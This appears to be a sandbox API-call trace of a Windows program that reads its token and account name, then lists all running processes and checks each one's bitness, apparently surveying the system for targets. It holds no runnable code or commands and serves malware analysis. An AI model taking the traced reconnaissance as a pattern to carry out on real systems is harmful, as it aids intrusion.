	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetTokenInformation (in: TokenHandle=0x230, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x27efb50 | out: TokenInformation=0x0, ReturnLength=0x27efb50) returned 0
	[0070.407] GetLastError () returned 0x7a
	[0070.407] GetTokenInformation (in: TokenHandle=0x230, TokenInformationClass=0x1, TokenInformation=0x72b770, TokenInformationLength=0x24, ReturnLength=0x27efb50 | out: TokenInformation=0x72b770, ReturnLength=0x27efb50) returned 1
	[0070.407] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x72b778*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x7715e8, cchName=0x27efaa8, ReferencedDomainName=0x771a08, cchReferencedDomainName=0x27efaac, peUse=0x27efaa4 | out: Name="Nd9E1FYi", cchName=0x27efaa8, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x27efaac, peUse=0x27efaa4) returned 1
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.408] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] GetLastError () returned 0x7a
	[0070.409] wsprintfW (in: param_1=0x27efb84, param_2="SESSION:\\\\%s\\%s\\%d" | out: param_1="SESSION:\\\\X2VS1CUM\\Nd9E1FYi\\1") returned 29
	[0070.409] CloseHandle (hObject=0x230) returned 1
	[0070.409] CloseHandle (hObject=0x220) returned 1
	[0070.409] StrCmpIW (psz1="SESSION:\\\\X2VS1CUM\\Nd9E1FYi\\1", psz2="SESSION:\\\\X2VS1CUM\\Nd9E1FYi\\1") returned 0
	[0070.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4022f0, lpParameter=0xc3c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x220
	[0070.410] CloseHandle (hObject=0x220) returned 1
	[0070.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0070.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7282f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x220
	[0070.410] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.410] CloseHandle (hObject=0x220) returned 1
	[0070.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6a8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0070.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0070.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x220
	[0070.411] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.411] CloseHandle (hObject=0x220) returned 1
	[0070.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7282f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.411] VirtualFree (lpAddress=0x2bb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0070.411] Sleep (dwMilliseconds=0x1e) 
	[0070.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16ae8) returned 0xc0000004
	[0070.488] VirtualAlloc (lpAddress=0x0, dwSize=0x16be8, flAllocationType=0x3000, flProtect=0x4) returned 0x2d10000
	[0070.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2d10000, Length=0x16be8, ResultLength=0x0 | out: SystemInformation=0x2d10000, ResultLength=0x0) returned 0x0
	[0070.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0070.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0070.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0070.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0070.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0070.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0070.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0070.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0070.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0070.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0070.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0070.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0070.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0070.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0070.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0070.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0070.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0070.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0070.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0070.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x230
	[0070.495] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.495] CloseHandle (hObject=0x230) returned 1
	[0070.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0070.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0070.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728818, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x230
	[0070.496] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.496] CloseHandle (hObject=0x230) returned 1
	[0070.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728878, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0070.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0070.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x230
	[0070.496] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.496] CloseHandle (hObject=0x230) returned 1
	[0070.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x230
	[0070.497] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.497] CloseHandle (hObject=0x230) returned 1
	[0070.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x230
	[0070.497] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.497] CloseHandle (hObject=0x230) returned 1
	[0070.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x230
	[0070.497] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.497] CloseHandle (hObject=0x230) returned 1
	[0070.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728818, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x230
	[0070.498] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.498] CloseHandle (hObject=0x230) returned 1
	[0070.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x230
	[0070.498] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.498] CloseHandle (hObject=0x230) returned 1
	[0070.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0070.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x230
	[0070.499] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.499] CloseHandle (hObject=0x230) returned 1
	[0070.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x230
	[0070.499] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.499] CloseHandle (hObject=0x230) returned 1
	[0070.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x230
	[0070.499] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.499] CloseHandle (hObject=0x230) returned 1
	[0070.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728818, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0070.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x230
	[0070.500] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.500] CloseHandle (hObject=0x230) returned 1
	[0070.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x230
	[0070.500] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.500] CloseHandle (hObject=0x230) returned 1
	[0070.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x230
	[0070.500] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.500] CloseHandle (hObject=0x230) returned 1
	[0070.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0070.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x230
	[0070.501] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.501] CloseHandle (hObject=0x230) returned 1
	[0070.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea40, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0070.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x230
	[0070.501] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.501] CloseHandle (hObject=0x230) returned 1
	[0070.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a58, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x230
	[0070.501] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.501] CloseHandle (hObject=0x230) returned 1
	[0070.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x230
	[0070.502] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.502] CloseHandle (hObject=0x230) returned 1
	[0070.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x230
	[0070.502] IsWow64Process (in: hProcess=0x230, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.502] CloseHandle (hObject=0x230) returned 1
